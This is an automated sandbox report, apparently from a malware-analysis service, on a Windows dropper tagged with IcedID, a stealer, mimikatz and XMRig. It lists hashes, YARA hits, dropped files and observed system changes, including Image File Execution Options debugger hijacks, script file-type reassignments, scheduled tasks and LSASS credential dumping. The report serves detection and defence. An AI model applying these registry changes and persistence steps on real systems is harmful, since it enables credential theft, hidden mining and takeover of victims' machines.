Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2024 18:23
Behavioral task
behavioral1
Sample
2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Resource
win7-20241010-en
windows7-x64
29 signatures
150 seconds
Behavioral task
behavioral2
Sample
2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
27 signatures
150 seconds
General
-
Target
2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
-
Size
4.3MB
-
MD5
fdcd0858c7855fe5d15be5345aec0c19
-
SHA1
5b260f84a9b4495ecfc255effae8c6365ca42a01
-
SHA256
c292c41a624026c8c157aaf8f197c57e4d62bf259d6933d382ddefd865006303
-
SHA512
f9102ccabc1e4e8446a1805499871a0c68240f5b23ef1df1ac4d9706600e525f55b57f63faea71c0bbae76437db4b487ced7b9ae76bab7d92895a76a1654af0c
-
SSDEEP
98304:rpuFB1/XTsJPZUIbzlMMvylQ6DxVEminfYzUhswFtmOb9G1:6jXKPZUWzlMMhEEminfYzhwH39
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Xmrig family
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 13 IoCs
resource yara_rule behavioral2/memory/1424-90-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig behavioral2/memory/1424-91-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig behavioral2/memory/1424-95-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig behavioral2/memory/1424-96-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig behavioral2/memory/1424-97-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig behavioral2/memory/1424-98-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig behavioral2/memory/1424-99-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig behavioral2/memory/1424-112-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig behavioral2/memory/1424-114-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig behavioral2/memory/1424-115-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig behavioral2/memory/1424-116-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig behavioral2/memory/1424-117-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig behavioral2/memory/1424-118-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 2 IoCs
resource yara_rule behavioral2/files/0x000c000000023b9c-1.dat mimikatz behavioral2/memory/2112-87-0x00007FF782B70000-0x00007FF782C5E000-memory.dmp mimikatz -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe -
Executes dropped EXE 8 IoCs
pid Process 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 5116 wimnat.exe 1424 taskmgr.exe 3048 xchlyg.exe 2112 vfshost.exe 4464 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 4876 GoogleCdoeUpdate.exe 5808 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe -
Creates a Windows Service
-
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\xchlyg.exe wimnat.exe File opened for modification C:\Windows\SysWOW64\xchlyg.exe wimnat.exe -
resource yara_rule behavioral2/memory/1424-68-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx behavioral2/files/0x0007000000023cd5-67.dat upx behavioral2/memory/2112-85-0x00007FF782B70000-0x00007FF782C5E000-memory.dmp upx behavioral2/files/0x0007000000023cd1-84.dat upx behavioral2/memory/2112-87-0x00007FF782B70000-0x00007FF782C5E000-memory.dmp upx behavioral2/memory/1424-90-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx behavioral2/memory/1424-91-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx behavioral2/memory/1424-95-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx behavioral2/memory/1424-96-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx behavioral2/memory/1424-97-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx behavioral2/memory/1424-98-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx behavioral2/memory/1424-99-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx behavioral2/memory/1424-112-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx behavioral2/memory/1424-114-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx behavioral2/memory/1424-115-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx behavioral2/memory/1424-116-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx behavioral2/memory/1424-117-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx behavioral2/memory/1424-118-0x00007FF60C2A0000-0x00007FF60C35D000-memory.dmp upx -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\svschost.xml 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\zlib1.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\Priess\ip.txt 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\posh-0.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\ssleay32.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\libeay32.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\ucl.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\Priess\scan.bat 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\cnli-1.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\libeay32.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\libxml2.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\AppCapture_x32.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\spoolsrv.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\zlib1.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\spoolsrv.xml 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\AppCapture_x32.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\Corporate\mimilib.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File opened for modification C:\Windows\InfusedAppe\Corporate\log.txt cmd.exe File created C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\spoolsrv.xml 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\trch-1.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\exma-1.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\tucl-1.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\Corporate\mimidrv.sys 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\AppCapture_x64.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\svschost.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\trfo-2.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File opened for modification C:\Windows\InfusedAppe\Priess\Result.txt GoogleCdoeUpdate.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\cnli-1.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\coli-0.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\svschost.xml 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\tibe-2.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\Corporate\vfshost.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\AppCapture_x64.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\posh-0.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\tibe-2.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\crli-0.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\ssleay32.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\trch-1.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File opened for modification C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\svschost.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\spoolsrv.xml 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\spoolsrv.xml 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\svschost.xml 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\crli-0.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File opened for modification C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\trfo-2.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\tucl-1.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\svschost.xml 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\spoolsrv.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\ucl.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\xdvl-0.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\svschost.xml 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\exma-1.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\libxml2.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\UnattendGC\specials\xdvl-0.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\svschost.xml 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\coli-0.dll 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\LocalService\specials\spoolsrv.xml 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File opened for modification C:\Windows\spoolsrv.xml 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File created C:\Windows\InfusedAppe\Corporate\scvhost.exe 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe File opened for modification C:\Windows\InfusedAppe\Priess\ip.txt 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 548 sc.exe -
System Location Discovery: System Language Discovery 1 TTPs 29 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language GoogleCdoeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xchlyg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wimnat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 xchlyg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz xchlyg.exe -
Modifies data under HKEY_USERS 10 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum xchlyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft xchlyg.exe Key created \REGISTRY\USER\.DEFAULT\Software xchlyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie xchlyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum\Version = "7" xchlyg.exe -
Modifies registry class 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3356 schtasks.exe 636 schtasks.exe 2384 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2112 vfshost.exe 2112 vfshost.exe 2112 vfshost.exe 2112 vfshost.exe 2112 vfshost.exe 2112 vfshost.exe 3048 xchlyg.exe 3048 xchlyg.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 3048 xchlyg.exe 3048 xchlyg.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe 2468 